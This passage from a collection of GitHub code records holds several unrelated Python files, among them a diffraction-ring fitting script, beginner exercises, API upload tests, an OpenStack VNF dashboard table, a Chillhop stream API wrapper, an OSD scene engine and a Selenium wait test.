RingIP.azimuthal_projection(image,true_center,r,0,2*np.pi-dtheta,num_theta)\n polar_image[i,:] = fi\n\nplt.figure(1)\nplt.imshow(polar_image,cmap='jet',vmin=0,vmax=200, interpolation='nearest')\nplt.figure(2)\nplt.imshow(image,cmap='jet',vmin=0,vmax=200, interpolation='nearest')\n\n# Success\n\n\n# Create fitting matrix \nreload(EM)\nnum_var_t = 15\nnum_var_r = 10\nvar_theta = np.linspace((dtheta),(np.pi/32),num_var_t)**2\nvar_rad = np.linspace(drad,3,num_var_r)**2\n\n# Generate unshifted basis function for each variance combination\n\n#Store stack of image slices\nB0_stack = np.zeros((num_rad,num_theta,num_var_t,num_var_r))\nfor t in range(num_var_t):\n for r in range(num_var_r):\n m_r = 0\n m_theta = 0\n B0 = EM.gaussian_basis_wrap_2D(num_theta,dtheta, m_theta, var_theta[t], \n num_rad, drad, m_r, var_rad[r]).reshape((num_rad,num_theta))\n B0_stack[:,:,t,r] = B0 \n\nB0_stack_ft = np.zeros(B0_stack.shape)\nfor tv in range(num_var_t):\n for rv in range(num_var_r):\n B0_stack_ft[:,:,tv,rv] = np.fft.fft2(B0_stack[:,:,tv,rv]) \n\n# Fit 2D data\nl1_ratio = 1\nmax_iters = 500\n\n#plt.figure(1)\n#plt.imshow(8000*B0_stack[:,:,12,9],cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\n#summ = 0\n#for t in range(num_var_t):\n# for r in range(num_var_r):\n# eigt = np.linalg.eig( np.dot(B0_stack[:,:,t,r].T,\n# B0_stack[:,:,t,r] ))\n# summ += np.max(eigt[0].real)\n# print(summ)\n# Sum was 7782.123\n \neig = np.linalg.eig( np.dot(B0_stack.reshape((num_rad*num_var_t*num_var_r,num_theta)).T,\n B0_stack.reshape((num_rad*num_var_t*num_var_r,num_theta)) ))\nL = np.max(eig[0].real)*num_rad*num_theta/1200\n \nprint('Circulant FISTA 2D')\nx_hat, times = LassoSolvers.fista_circulant_2D_Parallel(B0_stack, polar_image, \n L, l1_ratio, max_iters, \n positive=1, benchmark=1,verbose=1) \n\ny_hat = LassoSolvers.Ax_ft_2D(B0_stack_ft,x_hat)\n\n# Result Error\nerror = norm(y_hat-polar_image)/norm(polar_image)\nprint(error)\n\n# Result Sparsity \npos_coef = np.sum(x_hat>0)\ntot_coef = len(x_hat.ravel())\nsparsity0 = pos_coef/tot_coef\none_coef = np.sum(x_hat>1)\nsparsity1 = one_coef/tot_coef\nprint('x > 0 | x > 1 | total x')\nprint(str(pos_coef) + ' | ' + str(one_coef) + ' | ' + str(tot_coef))\nprint(str(sparsity0) + ' | ' + str(sparsity1))\n\nplt.figure(1)\nplt.imshow(y_hat,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\nplt.figure(2)\nplt.imshow(polar_image,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\"\"\"\ndata_out_dir = os.path.join('E:','CHESS_data')\nnp.save(os.path.join(data_out_dir,'result_2D_500_12.npy'),\n (x_hat, times, y_hat, polar_image,\n var_theta,var_rad,L,l1_ratio,max_iters))\n\"\"\"\n\n#%% Load and view results of previously completed trials \ndata_out_dir = os.path.join('E:','CHESS_data')\nprint_file = os.path.join(data_out_dir,'result_2D_800_7.npy')\nx_hat, times, y_hat, polar_image, var_theta,var_rad,L,l1_ratio,max_iters = np.load(print_file)\n\ny_hat = LassoSolvers.Ax_ft_2D(B0_stack_ft,x_hat)\n\n# Result Error\nerror = norm(y_hat-polar_image)/norm(polar_image)\nprint('Error: ' + str(error))\n\n# Result Sparsity \npos_coef = np.sum(x_hat>0)\ntot_coef = len(x_hat.ravel())\nsparsity0 = pos_coef/tot_coef\none_coef = np.sum(x_hat>1)\nsparsity1 = one_coef/tot_coef\nprint('x > 0 | x > 1 | total x')\nprint(str(pos_coef) + ' | ' + str(one_coef) + ' | ' + str(tot_coef))\nprint(str(sparsity0) + ' | ' + str(sparsity1))\nprint('L: ' +str(L))\nprint('l1_ratio: '+ str(l1_ratio))\nprint('max_iters: ' +str(max_iters))\nprint('var_theta: '+ str(var_theta[-1]))\nprint('var_rad: '+ 
str(var_rad[-1]))\nprint('time: '+ str(times))\n\nplt.figure(1)\nplt.imshow(y_hat,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n\nplt.figure(2)\nplt.imshow(polar_image,cmap='jet', interpolation='nearest',vmin=0,vmax=200)\n","repo_name":"ZHURUNZE000/CHESS-Research","sub_path":"ringFit_2D_test.py","file_name":"ringFit_2D_test.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"27137323227","text":"#Write a program that has a function called escreva(), which receives any text as a parameter\r\n# and shows a message whose size adapts to the size of the text. Do this as many times as the user wants.\r\n\r\ndef escreva(txt):\r\n    t = len(txt) + 4\r\n    print('#' * 30)\r\n    print(f\"{txt:^{t}}\")\r\n    print('#' * 30)\r\n\r\ndef invalida():\r\n    txt = 'Erroooouuu!!!'\r\n    t = len(txt) + 6\r\n    print(f\"\\033[31m{txt:^{t}}\\033[m\")\r\n\r\nwhile True:\r\n    msg = str(input('Por favor, digite sua mensagem: ')).strip()\r\n    escreva(msg)\r\n\r\n    r = str(input('Deseja continuar [S/N]? ')).upper().strip()\r\n    while r not in 'SN':\r\n        invalida()\r\n        r = str(input('Deseja continuar [S/N]? ')).upper().strip()\r\n    if r == 'N':\r\n        break\r\n\r\nprint(\"> Terminou! <\")\r\n\r\n","repo_name":"NicolasCGularte/Python","sub_path":"Aula013Ex002.py","file_name":"Aula013Ex002.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"6910452043","text":"goal = 10000\ntotal = 0\nreached_goal = False\nwhile reached_goal is False:\n    command = input()\n    if command == \"Going home\":\n        steps = int(input())\n        total += steps\n        if total >= goal:\n            reached_goal = True\n        break\n    else:\n        command = int(command)\n        total += command\n        if total >= goal:\n            reached_goal = True\ndiff = abs(total - goal)\nif reached_goal is True:\n    print(\"Goal reached! 
Good job!\")\n print(f\"{diff} steps over the goal!\")\nelse:\n print(f\"{diff} more steps to reach goal.\")\n\n\n\n\n\n","repo_name":"radostinnikolov/SoftUni-homeworks-and-projects","sub_path":"basics/while_loops/walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23234719734","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2022/05/04 00:51\r\n# @Author : Xiaoquan Xu\r\n# @File : 16_test.py\r\n\r\n# Test 16.Set a default model to the cloud\r\n# `PUT /model/base`\r\n\r\nimport os\r\nimport pytest\r\nimport random\r\nimport requests\r\nfrom names import *\r\nfrom simdev import *\r\n\r\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n\r\ndef generate_url():\r\n return API_BASE + \"/model/base\"\r\n\r\ndef log_in_session() -> requests.Session:\r\n s = requests.Session()\r\n body = {\"username\": USERNAME, \"password\": PASSWORD}\r\n s.post(API_BASE + \"/session\", json=body)\r\n return s\r\n \r\ndef generate_file(name: str):\r\n with open(name, \"w\") as f:\r\n for _ in range(10):\r\n f.write(str(random.randint(1,1000000))+\"\\n\")\r\n\r\ndef hash_content(content):\r\n with open(\"_tmp\", \"wb\") as f:\r\n f.write(content)\r\n h = hash_file(\"_tmp\")\r\n os.remove(\"_tmp\")\r\n return h\r\n\r\ndef test_good_set():\r\n s = log_in_session()\r\n url = generate_url()\r\n fname = \"f1.233\"\r\n generate_file(fname)\r\n files = {\"model\": (\"file1\", open(fname, \"rb\"))}\r\n res = s.put(url, files=files)\r\n h1 = hash_file(fname)\r\n os.remove(fname)\r\n assert res.status_code == 404\r\n \r\n # simd = SimDevice()\r\n # ts = requests.get(API_BASE + \"/timestamp\").text\r\n # head = {\"Authorization\": simd.ticket(ts)}\r\n # res = requests.get(API_BASE + \"/device/\" + str(simd.id) + \"/model\", headers=head)\r\n # assert \"Last-Modified\" not in res.headers\r\n # assert hash_content(res.content) == h1\r\n # assert res.status_code == 200\r\n\r\ndef test_interesting_request():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": (\"file1\", \"file2\")}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\ndef test_interesting_request2():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": \"file1\"}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\ndef test_bad_request():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"model\": (\"balala\",)}\r\n with pytest.raises(ValueError):\r\n res = s.put(url, files=files)\r\n\r\ndef test_bad_request2():\r\n s = log_in_session()\r\n url = generate_url()\r\n files = {\"modell\": (\"file1\", \"file2\")}\r\n res = s.put(url, files=files)\r\n assert res.status_code == 404\r\n\r\nif __name__ == \"__main__\":\r\n pytest.main([\"./16_test.py\"])","repo_name":"PigeonholeDSD/cloud-platform","sub_path":"test/16_test.py","file_name":"16_test.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"14464553126","text":"# https://www.acmicpc.net/problem/1181\n\nn = int(input())\nwords = []\nfor _ in range(n):\n words.append(input())\nwords = list(set(words)) # 중복제거\nwords.sort() # 미리 sort 해놓으면 알파벳 순으로 정렬된 상태 유지\na = sorted(words, key = lambda x : len(x)) # 길이에 따라 정렬\nfor word in a:\n print(word)\n\n\n# https://www.acmicpc.net/problem/11650\n\nn = int(input())\npoints = []\nfor _ in range(n):\n a,b = 
map(int,input().split())\n points.append([a,b])\nans = sorted(points, key = lambda x: (x[0],x[1]))\nfor i in range(n): \n print(ans[i][0],ans[i][1])","repo_name":"minchan1/one-step-a-day","sub_path":"baekjoon/0207.py","file_name":"0207.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36612840157","text":"from django.http import Http404\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import ngettext_lazy\nfrom django.utils.translation import pgettext_lazy\n\nfrom horizon import messages\nfrom horizon import tables\n\nfrom openstack_dashboard import policy\nfrom tacker_horizon.openstack_dashboard import api\nfrom tackerclient.common.exceptions import NotFound\n\n\nclass VNFManagerItem(object):\n def __init__(self, name, description, vnfs, vim, status,\n stack_status, stack_id, error_reason):\n self.name = name\n self.description = description\n self.vnfs = vnfs\n self.vim = vim\n self.status = status\n self.stack_status = stack_status\n self.id = stack_id\n self.error_reason = error_reason\n\n\nclass VNFManagerItemList(object):\n VNFLIST_P = []\n\n @classmethod\n def get_obj_given_stack_id(cls, vnf_id):\n for obj in cls.VNFLIST_P:\n if obj.id == vnf_id:\n return obj\n\n @classmethod\n def add_item(cls, item):\n cls.VNFLIST_P.append(item)\n\n @classmethod\n def clear_list(cls):\n cls.VNFLIST_P = []\n\n\nclass MyFilterAction(tables.FilterAction):\n name = \"myfilter\"\n\n\nclass StacksUpdateRow(tables.Row):\n ajax = True\n\n def can_be_selected(self, datum):\n return datum.status != 'DELETE_COMPLETE'\n\n def get_data(self, request, stack_id):\n try:\n stack = api.heat.stack_get(request, stack_id)\n if stack.stack_status == 'DELETE_COMPLETE':\n # returning 404 to the ajax call removes the\n # row from the table on the ui\n raise Http404\n item = VNFManagerItemList.get_obj_given_stack_id(stack_id)\n item.status = stack.status\n item.stack_status = stack.stack_status\n return item\n except Http404:\n raise\n except Exception as e:\n messages.error(request, e)\n raise\n\n\nclass VNFUpdateRow(tables.Row):\n ajax = True\n\n def can_be_selected(self, datum):\n return datum.status != 'DELETE_COMPLETE'\n\n def get_data(self, request, vnf_id):\n try:\n # stack = api.heat.stack_get(request, stack_id)\n # if stack.stack_status == 'DELETE_COMPLETE':\n # returning 404 to the ajax call removes the\n # row from the table on the ui\n # raise Http404\n item = VNFManagerItemList.get_obj_given_stack_id(vnf_id)\n vnf_instance = api.tacker.get_vnf(request, vnf_id)\n\n if not vnf_instance and not item:\n # TODO(NAME) - bail with error\n return None\n\n if not vnf_instance and item:\n # API failure, just keep the current state\n return item\n\n vnf = vnf_instance['vnf']\n try:\n vnf_services_str = vnf['attributes']['service_type']\n except KeyError:\n vnf_services_str = \"\"\n try:\n vnf_desc_str = vnf['description']\n except KeyError:\n vnf_desc_str = \"\"\n\n vim = vnf['placement_attr'].get('vim_name', '')\n if not item:\n # Add an item entry\n item = VNFManagerItem(vnf['name'], vnf_desc_str,\n vnf_services_str, str(vim),\n vnf['status'], vnf['status'], vnf['id'],\n vnf['error_reason'])\n else:\n item.description = vnf_desc_str\n item.vnfs = vnf_services_str\n item.status = vnf['status']\n item.stack_status = vnf['status']\n return item\n except (Http404, NotFound):\n raise Http404\n except Exception as e:\n messages.error(request, e)\n raise\n\n\nclass 
DeleteVNF(policy.PolicyTargetMixin, tables.DeleteAction):\n @staticmethod\n def action_present(count):\n return ngettext_lazy(\n \"Terminate VNF\",\n \"Terminate VNFs\",\n count\n )\n\n @staticmethod\n def action_past(count):\n return ngettext_lazy(\n \"Terminate VNF\",\n \"Terminate VNFs\",\n count\n )\n\n def action(self, request, obj_id):\n api.tacker.delete_vnf(request, obj_id)\n\n\nclass DeployVNF(tables.LinkAction):\n name = \"deployvnf\"\n verbose_name = _(\"Deploy VNF\")\n classes = (\"ajax-modal\",)\n icon = \"plus\"\n url = \"horizon:nfv:vnfmanager:deployvnf\"\n\n\nclass VNFManagerTable(tables.DataTable):\n STATUS_CHOICES = (\n (\"ACTIVE\", True),\n (\"ERROR\", False),\n )\n STACK_STATUS_DISPLAY_CHOICES = (\n (\"init_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Init In Progress\")),\n (\"init_complete\", pgettext_lazy(\"current status of stack\",\n \"Init Complete\")),\n (\"init_failed\", pgettext_lazy(\"current status of stack\",\n \"Init Failed\")),\n (\"create_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Create In Progress\")),\n (\"create_complete\", pgettext_lazy(\"current status of stack\",\n \"Create Complete\")),\n (\"create_failed\", pgettext_lazy(\"current status of stack\",\n \"Create Failed\")),\n (\"delete_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Delete In Progress\")),\n (\"delete_complete\", pgettext_lazy(\"current status of stack\",\n \"Delete Complete\")),\n (\"delete_failed\", pgettext_lazy(\"current status of stack\",\n \"Delete Failed\")),\n (\"update_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Update In Progress\")),\n (\"update_complete\", pgettext_lazy(\"current status of stack\",\n \"Update Complete\")),\n (\"update_failed\", pgettext_lazy(\"current status of stack\",\n \"Update Failed\")),\n (\"rollback_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Rollback In Progress\")),\n (\"rollback_complete\", pgettext_lazy(\"current status of stack\",\n \"Rollback Complete\")),\n (\"rollback_failed\", pgettext_lazy(\"current status of stack\",\n \"Rollback Failed\")),\n (\"suspend_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Suspend In Progress\")),\n (\"suspend_complete\", pgettext_lazy(\"current status of stack\",\n \"Suspend Complete\")),\n (\"suspend_failed\", pgettext_lazy(\"current status of stack\",\n \"Suspend Failed\")),\n (\"resume_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Resume In Progress\")),\n (\"resume_complete\", pgettext_lazy(\"current status of stack\",\n \"Resume Complete\")),\n (\"resume_failed\", pgettext_lazy(\"current status of stack\",\n \"Resume Failed\")),\n (\"adopt_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Adopt In Progress\")),\n (\"adopt_complete\", pgettext_lazy(\"current status of stack\",\n \"Adopt Complete\")),\n (\"adopt_failed\", pgettext_lazy(\"current status of stack\",\n \"Adopt Failed\")),\n (\"snapshot_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Snapshot In Progress\")),\n (\"snapshot_complete\", pgettext_lazy(\"current status of stack\",\n \"Snapshot Complete\")),\n (\"snapshot_failed\", pgettext_lazy(\"current status of stack\",\n \"Snapshot Failed\")),\n (\"check_in_progress\", pgettext_lazy(\"current status of stack\",\n \"Check In Progress\")),\n (\"check_complete\", pgettext_lazy(\"current status of stack\",\n \"Check Complete\")),\n (\"check_failed\", pgettext_lazy(\"current status of stack\",\n \"Check Failed\")),\n )\n name = tables.Column(\"name\",\n 
link=\"horizon:nfv:vnfmanager:detail\",\n verbose_name=_(\"VNF Name\"))\n description = tables.Column(\"description\",\n verbose_name=_(\"Description\"))\n vnfs = tables.Column(\"vnfs\",\n verbose_name=_(\"Deployed Services\"))\n vim = tables.Column(\"vim\", verbose_name=_(\"VIM\"))\n status = tables.Column(\"status\",\n hidden=True,\n status=True,\n status_choices=STATUS_CHOICES)\n stack_status = tables.Column(\"stack_status\",\n verbose_name=_(\"Status\"),\n display_choices=STACK_STATUS_DISPLAY_CHOICES)\n error_reason = tables.Column(\"error_reason\",\n verbose_name=_(\"Error Reason\"))\n\n class Meta(object):\n name = \"vnfmanager\"\n verbose_name = _(\"VNFManager\")\n status_columns = [\"status\", ]\n row_class = VNFUpdateRow\n table_actions = (DeployVNF, DeleteVNF, MyFilterAction,)\n","repo_name":"openstack/tacker-horizon","sub_path":"tacker_horizon/openstack_dashboard/dashboards/nfv/vnfmanager/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"20498188150","text":"from datetime import datetime\nimport requests\nimport json\nimport time\n\nclass live:\n def __init__(self, stream_index=0, log_bad_response=False): # default value if no index is passed\n self.streams = [{'name': 'Chillhop Radio 🐾', 'id': '5yx6BWlEVcY', 'appid': '889847839662956615'}, {'name': 'lofi hip hop radio 🐾', 'id': '7NOSDKb0HlU', 'appid': '890420933280550922'}]\n self.stream_index = stream_index\n self.log_bad_response = log_bad_response # will remove this eventually\n\n def parse_response(self, response): # you can easily add variables to grab from the json here\n result = []\n \n for i in response: # iterates over a list of multiple tracks, useful for get_track_history()\n title = i[\"title\"] \n artists = []\n for artist in i[\"artists\"]:\n artists.append(artist[\"name\"])\n artists = ', '.join(artists)\n track_id = i[\"id\"]\n post_id = i[\"post_id\"]\n spotify_url = f\"https://spotify.com/track/{i['spot_id']}\"\n last_play = i[\"last_play\"]\n duration = i[\"duration\"]\n img = i[\"img\"]\n result.append({'title': title, 'artists': artists, 'track_id': track_id, 'post_id': post_id, 'spotify_url': spotify_url, 'last_play': last_play, 'duration': duration, 'img': img})\n\n return result\n\n def get_track_info(self):\n data = {'action': 'player_get_livestream_tracks', 'youtubeid': self.streams[self.stream_index]['id'], 'type': 'history', 'lastPull': (str(int(time.time()))), 'offset': '0'}\n\n while True:\n response = json.loads(requests.post('https://chillhop.com/wp-admin/admin-ajax.php', data=data).content)\n try: \n result = self.parse_response(response[\"livetracks\"])[0] # returned list should only contain one dict\n break\n except IndexError: # Chillhop's API sometimes returns nothing for a few seconds between songs - this handles that\n if self.log_bad_response == True:\n print(\"Encountered IndexError - waiting a bit...\")\n print('Response received:')\n print(response)\n time.sleep(4) # spam it until it works lol\n\n return result\n\n def get_track_history(self, offset):\n # -- WIP --\n # Chillhop's API returns information on the 20 last-played tracks at a time\n # Offset 0 will actually only return the currently playing track, but get_track_info() is provided as a more convenient function for this\n\n if offset < 0:\n raise ValueError(\"Offset passed to API cannot be negative\") # invalid offsets don't return anything useful\n data = {'action': 
'player_get_livestream_tracks', 'youtubeid': self.streams[self.stream_index]['id'], 'type': 'history', 'lastPull': (str(int(time.time()))), 'offset': str(offset)}\n while True:\n response = json.loads(requests.post('https://chillhop.com/wp-admin/admin-ajax.php', data=data).content)\n try: \n result = self.parse_response(response[\"livetracks\"])\n break\n except IndexError:\n if self.log_bad_response == True:\n print(\"Encountered IndexError - waiting a bit...\")\n print(f\"Response received:\")\n print(response)\n time.sleep(4) # spam it until it works lol\n return result\n\n def get_current_views(self): # BUG: this request 404s even on Chillhop's website, maybe a change in the API?\n response = requests.get(f'https://chillhop.com/fetch3/?action=get_current_views&youtube_id={self.streams[self.stream_index][\"id\"]}')\n result = json.loads(response.content)[\"viewers\"]\n return result","repo_name":"dmgrstuff/chillhop-live-rpc","sub_path":"chillhop.py","file_name":"chillhop.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34808328975","text":"# -*- coding:utf-8 -*-\r\n\r\nimport os\r\nimport shutil\r\nimport hexdump\r\nimport yaml\r\nimport struct\r\n\r\nfrom log import Log\r\nfrom imageutil import ImageUtil\r\nfrom font import Font\r\nfrom rectangle import Rectangle\r\nfrom palette import Palette\r\nfrom line import Line\r\nfrom window import Window\r\nfrom bitmap import Bitmap\r\nfrom glyph import Glyph\r\nfrom modifier import *\r\nfrom osdobject import OSDObjectType, OSDObject\r\n\r\nlogger = Log.get_logger(\"engine\")\r\n\r\n\r\nclass Scene(object):\r\n _BASE_DIR = None\r\n\r\n def __init__(self, yaml_file=None):\r\n self._yaml_file = None\r\n self._windows = []\r\n self._ingredients = {}\r\n self._palettes = {}\r\n self._modifiers = []\r\n self._width = -1\r\n self._height = -1\r\n self._frames = 1\r\n self._ticks = 20\r\n self.load(yaml_file)\r\n\r\n @property\r\n def filename(self):\r\n return self._yaml_file\r\n\r\n @property\r\n def width(self):\r\n return self._width\r\n\r\n @property\r\n def height(self):\r\n return self._height\r\n\r\n @property\r\n def frames(self):\r\n return self._frames\r\n\r\n @property\r\n def ticks(self):\r\n return self._ticks\r\n\r\n def find_palette(self, id):\r\n if id in self._palettes:\r\n return self._palettes[id]\r\n else:\r\n logger.warn('cannot find palette <%s>' % id)\r\n return None\r\n\r\n def find_ingredient(self, id):\r\n if id in self._ingredients:\r\n return self._ingredients[id]\r\n else:\r\n logger.warn('cannot find ingredient <%s>' % id)\r\n return None\r\n\r\n def find_window(self, id):\r\n for window in self._windows:\r\n if window.id == id:\r\n return window\r\n logger.warn('cannot find window <%s>' % id)\r\n return None\r\n\r\n def find_block(self, id):\r\n block = None\r\n ids = id.split('.')\r\n if len(ids) == 2:\r\n window = self.find_window(ids[0])\r\n if window is not None:\r\n block = window.find_block(ids[1])\r\n if block is None:\r\n logger.warn('cannot find block <%s>' % id)\r\n return block\r\n\r\n def load(self, yaml_file):\r\n if not os.path.isfile(yaml_file) or not os.access(yaml_file, os.R_OK):\r\n raise Exception('%s does not exist or cannot read' % yaml_file)\r\n\r\n self._yaml_file = os.path.abspath(yaml_file).replace('\\\\', '/')\r\n logger.debug('Loading OSD yaml file: <%s>' % self._yaml_file)\r\n\r\n Scene._BASE_DIR = os.path.dirname(self._yaml_file) + '/'\r\n\r\n logger.debug('BASE_DIR: <%s>' % 
Scene._BASE_DIR)\r\n\r\n        ImageUtil.BASE_DIR = Scene._BASE_DIR\r\n        Font.BASE_DIR = Scene._BASE_DIR\r\n\r\n        self._yaml_file = yaml_file\r\n        with open(self._yaml_file) as f:\r\n            content = f.read()\r\n            config = yaml.load(content)\r\n            if config is None:\r\n                raise Exception('cannot load yaml file %s' % self._yaml_file)\r\n\r\n            config = config['OSD']\r\n            assert (config is not None and\r\n                    config['width'] is not None and\r\n                    config['height'] is not None)\r\n            self._width = config['width']\r\n            self._height = config['height']\r\n            self._frames = 1 if 'frames' not in config else int(config['frames'])\r\n\r\n            logger.debug('Width:%d, Height:%d' % (self._width, self._height))\r\n\r\n            for item in config['Palettes']:\r\n                obj = self._create_object(item)\r\n                self._palettes[obj.id] = obj\r\n\r\n            for item in config['Ingredients']:\r\n                obj = self._create_object(item)\r\n                self._ingredients[obj.id] = obj\r\n\r\n            for item in config['Windows']:\r\n                obj = self._create_object(item)\r\n                self._windows.append(obj)\r\n            self.sort_windows()\r\n\r\n            if 'Modifiers' in config:\r\n                for item in config['Modifiers']:\r\n                    obj = self._create_object(item)\r\n                    self._modifiers.append(obj)\r\n\r\n    def sort_windows(self):\r\n        self._windows.sort(key=lambda window: window.zorder, reverse=False)\r\n\r\n    def _create_object(self, item):\r\n        assert (len(item.keys()) > 0)\r\n        cls_name = list(item.keys())[0]\r\n        values = item[cls_name]\r\n        logger.debug('Construct Class \\'%s\\' by %s' % (cls_name, values))\r\n        if cls_name not in globals():\r\n            raise Exception('Undefined class <%s>' % cls_name)\r\n        cls = globals()[cls_name]\r\n        obj = cls(scene=self, **values)\r\n        logger.debug(obj)\r\n        return obj\r\n\r\n    def modify(self):\r\n        for modifier in self._modifiers:\r\n            if modifier.active:\r\n                modifier.run()\r\n\r\n    def paint_line(self, y, line_buffer, painter):\r\n        str_color = '{'\r\n        for pixel in line_buffer:\r\n            str_color = str_color + (\" #%06x\" % pixel)\r\n        str_color = str_color + '}'\r\n        painter.set_pixel(0, y, str_color)\r\n\r\n    def merge_line(self, dst_buf, src_buf, src_buf_offset, src_alpha):\r\n        \"\"\"\r\n        Blend the source buffer into the destination buffer\r\n        \"\"\"\r\n        assert (src_buf_offset + len(src_buf) < self._width)\r\n        for x in range(src_buf_offset, src_buf_offset + len(src_buf)):\r\n            dst_buf[x] = ImageUtil.blend_pixel(dst_buf[x], src_buf[x - src_buf_offset], src_alpha)\r\n\r\n    def _merge_line_buffers(self, window_line_buffers, width):\r\n        line_buffer = [0] * width\r\n        for window_line_buf in window_line_buffers:\r\n            self.merge_line(line_buffer,\r\n                            window_line_buf.buffer,\r\n                            window_line_buf.start_x,\r\n                            window_line_buf.window.alpha)\r\n\r\n        return line_buffer\r\n\r\n    def draw(self, painter):\r\n        for y in range(0, self._height):\r\n            window_line_buffers = []\r\n            for window in self._windows:\r\n                if not window.visible:\r\n                    continue\r\n                if window.y <= y < window.y + window.height:\r\n                    window_line_buffers.append(window.draw_line(y))\r\n            line_buffer = self._merge_line_buffers(window_line_buffers, self._width)\r\n            self.paint_line(y, line_buffer, painter)\r\n\r\n    def __str__(self):\r\n        str = 'Scene(%d x %d, %s)\\n' % (self._width, self._height, self._yaml_file)\r\n        str += 'Palettes[%d]\\n' % len(self._palettes)\r\n        for palette in self._palettes:\r\n            str += '\\t%s\\n' % palette\r\n        str += 'Ingredients[%d]\\n' % len(self._ingredients)\r\n        for ingredient in self._ingredients:\r\n            str += '\\t%s\\n' % ingredient\r\n        return str\r\n\r\n    def generate_binary(self, target_folder=None):\r\n        \"\"\"\r\n        struct object_binary{\r\n            u16 object_type;\r\n            u16 object_index;\r\n            u32 
object_size;\r\n u8 object_data[object_size];\r\n }\r\n \"\"\"\r\n assert self._yaml_file is not None\r\n if target_folder is None:\r\n path = os.path.splitext(self._yaml_file)\r\n target_folder = path[0] + '.generated'\r\n logger.debug('Target folder:%s' % target_folder)\r\n if os.path.exists(target_folder):\r\n shutil.rmtree(target_folder, ignore_errors=True)\r\n os.mkdir(target_folder)\r\n\r\n file_offset = 0\r\n global_data = []\r\n object_index = 0\r\n\r\n bin_filename = target_folder + \"/osd.bin\"\r\n bin_file = open(bin_filename, \"wb+\")\r\n objects_list = (self._palettes, self._ingredients, self._windows, self._modifiers)\r\n for objects in objects_list:\r\n items = objects if isinstance(objects, list) else objects.values()\r\n for item in items:\r\n item.object_id = OSDObject.make_object_id(item.type(), object_index)\r\n bins = item.to_binary()\r\n if len(bins) % 4 != 0:\r\n raise Exception('binary length of <%s> should 4 bytes align: %d' % (item.id, len(bins)))\r\n gen_bytes = struct.pack(' id<0x%x> type<%s> '\r\n 'bytes<0x%x> offset<0x%x>' % (\r\n item.id, item.object_id, item.type().name,\r\n len(gen_bytes), file_offset))\r\n logger.debug('\\n' + hexdump.hexdump(gen_bytes, result='return'))\r\n file_offset += len(gen_bytes)\r\n logger.debug('To_binary, TOTAL LENGTH <0x%x>', file_offset)\r\n with open(target_folder + '/global.yaml', 'w') as meta_file:\r\n yaml.dump(global_data,\r\n meta_file,\r\n default_flow_style=False,\r\n indent=4)\r\n bin_file.close()\r\n\r\n with open(bin_filename, 'rb') as f:\r\n logger.debug('\\n' + hexdump.hexdump(f.read(), result='return'))\r\n","repo_name":"fenixchen/MindMap","sub_path":"MOE/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18763294129","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport unittest\n\nclass ExplicitWaitTests(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r'C:\\\\Selenium\\\\WebDriver\\\\Chrome\\\\chromedriver89_win32.exe')\n self.driver.get(\"http://demo.magentocommerce.com/\")\n\n def test_account_link(self):\n\n ## 1 : Implementing custom wait conditions\n WebDriverWait(self.driver, 10).until(lambda s: s.find_element_by_id(\"js-headerbutton\").get_attribute(\"href\") == \"https://magento.com/products/experience-magento?utm_source=m.com&utm_medium=website&utm_campaign=WW_200101_WBS_ACOM_ForgeDX_Overview_Demo\")\n\n ## 2\n careers = WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.LINK_TEXT, \"Careers\")))\n careers.click()\n\n ## Waiting for an element to be enabled\n def test_create_new_customer(self):\n # click on Log In link to open Login page\n account_icon_button = self.driver.find_element_by_class_name(\"account-icon\")\n account_icon_button.click()\n\n account_button = WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.LINK_TEXT, \"Create an account\")))\n account_button.click()\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == \"__main__\":\n 